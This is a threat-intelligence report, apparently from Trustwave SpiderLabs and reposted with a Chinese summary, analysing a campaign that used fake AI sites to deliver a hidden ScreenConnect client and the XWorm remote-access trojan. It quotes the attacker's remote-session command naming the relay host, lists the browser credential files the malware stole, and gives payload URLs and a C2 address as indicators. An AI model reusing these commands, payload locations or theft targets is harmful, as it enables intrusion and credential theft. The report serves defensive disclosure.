Malicious Screen Connect Campaign Abuses AI-Themed Lures for Xworm Delivery
网络攻击者利用伪造的AI相关内容诱骗用户下载恶意ScreenConnect安装程序,并通过数字签名隐藏其作为远程访问木马的功能。该程序建立多阶段感染链,在受害者设备上执行恶意代码并窃取凭证。攻击者还利用GitHub托管payload,并通过注册表实现持久化机制。此次事件凸显威胁狩猎在检测复杂攻击中的重要性。 2025-8-27 18:32:48 Author: www.trustwave.com(查看原文) 阅读量:8 收藏

6 Minute Read

During a recent Advanced Continual Threat Hunt (ACTH) investigation, the Trustwave SpiderLabs Threat Hunt team identified a deceptive campaign that abused fake AI-themed content to lure users into executing a malicious, pre-configured ScreenConnect installer.

While the binary was digitally signed and masqueraded as legitimate, human-led analysis revealed a concealed Remote Access Trojan (RAT) functionality and a multi-stage infection chain involving a GitHub-hosted payload aiming to infect the victims’ host with an Xworm — a commonly known RAT available through the malware-as-a-service model.

Notably, many stages of this campaign bypassed EDR alerting and required manual timeline review within Defender to identify malicious behavior, highlighting the crucial role of threat hunting in modern detection strategies.

Initial access:

The initial access and delivery of the ScreenConnect remote management tool identified by the team were obtained by tricking users into downloading a disguised, modified installer. To do so, the threat actors used many social engineering techniques such as phishing, malvertising or social media posts. In one observed case, a user was tricked into visiting a fake AI website “gtpgrok[.]ai” (currently offline), which redirected them to a suspicious website “anhemvn6[.]com”.

Figure 1. Screenshots of gptgrok[.]ai (left) and anhemvn6[.]com (right) when sites were still active
Figure 1. Screenshots of gptgrok[.]ai (left) and anhemvn6[.]com (right) when sites were still active.

Immediately after a download of ScreenConnect installer started, to not raise users’ suspicious and convince them to run the file, it was named “Creation_Made_By_GrokAI.mp4 Grok.com.” However, an analysis of said file shows that it’s in fact “ScreenConnect.ClientSetup.msi”. Further campaign analysis showed similar cases when the malicious file was also seen with different names such as:

  • Creation_Made_By_GoogleAI.mp4 Google.com
  • Creation_Made_By_DeepSeek.mp4 DeepSeek.com
  • Creation_Made_By_SoraAI.mp4 OpenAI.com

Analysis of this executable showed that it drops the ScreenConnect binary in the Temp directory. This is then automatically executed and continues to run in the background.

Figure 2. ScreenConnect client running in the background
Figure 2. ScreenConnect client running in the background.

This client was pre-configured to run hidden from the user’s sight and connect to a remote ScreenConnect server controlled by the threat actor.

Figure 3. Some of Creation_Made_By_GrokAI.mp4 Grok.com configuration settings
Figure 3. Some of the Creation_Made_By_GrokAI.mp4 Grok.com configuration settings.

The following command was used to establish a remote access session:

"ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-keoxeq-relay[.]screenconnect[.]com&p=443&s=44f<REDACTED>&k=BgIAAA<REDACTED>&c=GROKgpt"

Table_1
Table 1. Parameters for remote session controlled by the threat actor.

Interestingly, collected samples showed that the threat actors manipulated Authenticode — Microsoft code-signing technology — to embed malicious configurations within the digital signature of the legitimate ScreenConnect binary. This allowed the attacker to modify the behavior of the application without invalidating its digital signature.

Figure 4. Endpoint detection and response (EDR) solution recognizing a valid signature for a modified ScreenConnect installer
Figure 4. Endpoint detection and response (EDR) solution recognizing a valid signature for a modified ScreenConnect installer.

Once installed, the ScreenConnect client successfully establishes a remote session controlled by the attacker allowing for further execution of the kill chain. Thanks to this modified configuration, it is not visible to a user as all visual indicators (icons, pop-ups, tray messages) were turned off.

Execution:

During the remote session, we observed that a particular file called “X-META Firebase_crypted.bat” was dropped and executed on the victim’s machine. This X-META Firebase_crypted.bat led to mshta.exe executing a script (IWshShell3.Run(""C:\Users\Mguise\ONEDRI~1\DOCUME~1\loadding\Temp\X-META~1.BAT" ::", "0".)

It appears the main purpose of this activity was to start cmd.exe and execute a set of commands that led to the download and extraction of a zip archive (“5btc.zip”). The domain hosting this archive used the same naming convention used during delivery of ScreenConnect installer: “anhemvn4[.]com.”

Files were extracted to a new folder called “xmetavip”, which was located directly under C:\ drive. After archive extraction, we observed the execution of pythonw.exe renamed to pw.exe (delivered in a zip file) which runs Base64-encoded command. After decoding it, we identified that it was an attempt to execute Python code located on a public GitHub repository (hxxps[://]github[.]com/trieule99911/vianhthuongbtc). With this fileless execution, threat actors likely aimed to evade static detection mechanisms, which would be triggered if the file “basse64.txt” were delivered in “5btc.zip”.

Figure 5. pw.exe (pythonw.exe) encoded command — view from the EDR console
Figure 5. pw.exe (pythonw.exe) encoded command — view from the EDR console.

Figure 6. basse64.txt being recognized as a known stealer on VirusTotal
Figure 6. basse64.txt being recognized as a known stealer on VirusTotal.

Although the file content was encoded with Base64 and was highly obfuscated, it was identified to perform process injection (in the observed case, into a chrome.exe and msedge.exe) processes that were spawned when pw.exe was executed following the process hollowing (T1055.012) technique scenario. Those instances of web browsers were also launched on a hidden desktop to avoid detection by a legitimate user (T1564.003.)

Persistence:

During the execution of “X-META Firebase_crypted.bat”, we also observed that apart from downloading the “5btc.zip” archive, it also ran encoded and obfuscated Python commands and code. Aside from that, a persistence mechanism was implemented on the host. A registry run key was modified (T1547.001) to run a specified command on each user login. As shown in Figure 7, a reg.exe command was used to add the Windows Security (the name used mimics a legitimate system component most likely to make detection harder) value in 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. Data added to the registry led to one of the files being delivered in a zip archive: “C:\xmetavip\backup.bat”. With this configuration, “backup.bat” will be executed whenever a user logs onto their machine.

Figure 7. Command line used to implement persistence
Figure 7. Command line used to implement persistence.

The implementation of this persistence mechanism proved during the investigation, as we observed the execution of the bat script. As per the analyzed event, its main goal was to abuse the renamed pythonw.exe (delivered in initial stages) and execute similar encoded Python commands to run obfuscated code located on the same GitHub repository also observed in initial stages.

Figure 8. pw.exe executed by a persistence mechanism and the decoded content of its command line
Figure 8. pw.exe executed by a persistence mechanism and the decoded content of its command line

This time, the decoded content showed a different file, “buquabua.txt .“  

Credential Access and Discovery:  

During the execution chain, we observed several events indicating attempts at Credential Access and Discovery. For Discovery, we identified WMI query executions used to extract detailed information about the current operating system (T1082) and to gather data on installed antivirus products (T1518.001). Additionally, pw.exe attempted to access sensitive browser-related files (T1555.003), such as:

  • \Device\HarddiskVolume3\Users\<current user>\AppData\Local\Google\Chrome\User Data\Default\Login Data
  • \Device\HarddiskVolume3\Users\\<current user>\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
  • \Device\HarddiskVolume3\Users\\<current user>\AppData\Roaming\Mozilla\Firefox\Profiles\nd5ol1v2.default-release-1706746804908\key4.db
  • \Device\HarddiskVolume3\\<current user>\Mguise\AppData\Roaming\Mozilla\Firefox\Profiles\nd5ol1v2.default-release-1706746804908\logins.json

Additional Artifacts Observed:

During the team’s investigation, we discovered that the GitHub repository hosting the malicious code contained not only two files directly observed in the attack chain, but in fact it hosted 11 files in total and was also created only a week prior to the observed malicious activities.

All the files, which were disguised as text files, contained a highly obfuscated Python code that was ultimately encoded with base64. To better understand this campaign, the SpiderLabs team analyzed the files from the public repository referenced in the described attack chain. Extracted strings show that most of the files share the same behavior patterns where they implement a persistence mechanism via a registry key.

The name of the value implemented in the registry varies but always tries to mimic legitimate system operation. Names like: UpdateWins WindowsSecurity were observed. Additionally, files located in this repository can be divided into two groups. The first is responsible for creating persistence. They are also responsible for downloading and injecting files from the second group into legitimate processes. Files from the second group serve as a final payload and are more complex. These contain multiple execution layers and their behavior and content attribute them to a commonly known yet still evolving malware-as-a-service RAT — XWorm. During binary analysis, the SpiderLabs team was also able to extract a command-and-control (C2) IP used in one of the final payload scripts (“Exppiyt.txt”). The IP extracted is 5[.]181[.]165[.]102:7705 and at the time of analysis was not recognized as malicious on VirusTotal.

Figure 9. VirusTotal search result for the supposed C2 Ip extracted from binary injected during the attack chain
Figure 9. VirusTotal search result for the supposed C2 IP extracted from the binary injected during the attack chain.

Summary:

The observed activities reflect a broader and increasingly sophisticated trend among threat actors: leveraging AI-related branding and repurposing legitimate remote access tools to distribute commodity malware.

This particular campaign, uncovered by the SpiderLabs Threat Hunt Team, demonstrates how attackers are exploiting people’s current fascination with AI to enhance the credibility and appeal of their social engineering tactics. Adversaries can bypass traditional detection mechanisms and infiltrate target environments with alarming efficiency.

What sets this investigation apart is not just the technical findings, but the methodology behind them. This was a hunt-driven investigation, powered by human-led analysis — a critical component in identifying threats that evade automated systems.

While machine learning and automated detection play a vital role in modern cybersecurity, they are not infallible. Sophisticated adversaries are increasingly designing campaigns to slip past these defenses, making expert-driven threat hunting more essential than ever.

The SpiderLabs Threat Hunt Team’s findings prove the value of proactive, human-centric threat analysis. It also reinforces the strategic importance of investing in skilled threat hunters who can think like adversaries, adapt to evolving tradecraft, and uncover hidden threats before they cause damage.

In an era where attackers are constantly innovating, SpiderLabs’ threat hunting provides organizations with a crucial advantage — combining deep technical expertise with investigative rigor to stay ahead of the curve. Their work not only protects clients from immediate threats but also contributes to the broader cybersecurity community by exposing emerging tactics and techniques.

Appendix – Indicators of compromise:

Table_2

URLs 

  • hxxps://gptgrok[.]ai
  • hxxps://anhemvn6[.]com
  • hxxps://anhemvn4[.]com/5btc[.]zip
  • hxxps://github[.]com/trieule99911/vianhthuongbtc
  • hxxps://raw.githubusercontent[.]com/trieule99911/vianhthuongbtc/refs/heads/main/basse64.txt
  • hxxps://raw.githubusercontent[.]com/trieule99911/vianhthuongbtc/refs/heads/main/backpuppure.txt
  • hxxps://raw.githubusercontent[.]com/trieule99911/vianhthuongbtc/refs/heads/main/abcdegia.txt
  • hxxps://raw.githubusercontent[.]com/trieule99911/vianhthuongbtc/refs/heads/main/Nhwneafyp.txt
  • hxxps://raw.githubusercontent[.]com/trieule99911/vianhthuongbtc/refs/heads/main/Hzcbmqnqwlv.txt
  • hxxps://raw.githubusercontent[.]com/trieule99911/vianhthuongbtc/refs/heads/main/Exppiyt.txt
  • hxxps://raw.githubusercontent[.]com/trieule99911/vianhthuongbtc/refs/heads/main/x-metavn.txt
  • hxxps://raw.githubusercontent[.]com/trieule99911/vianhthuongbtc/refs/heads/main/purecoookielog.txt
  • hxxps://raw.githubusercontent[.]com/trieule99911/vianhthuongbtc/refs/heads/main/exepurelog.txt
  • hxxps://raw.githubusercontent[.]com/trieule99911/vianhthuongbtc/refs/heads/main/cccccccccccccccccccccccc.txt
  • hxxps://raw.githubusercontent[.]com/trieule99911/vianhthuongbtc/refs/heads/main/buquabua.txt

C2 IP:

  • 5[.]181[.]165[.]102[:]7705


文章来源: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/malicious-screen-connect-campaign-abuses-ai-themed-lures-for-xworm-delivery/
如有侵权请联系:admin#unsafe.sh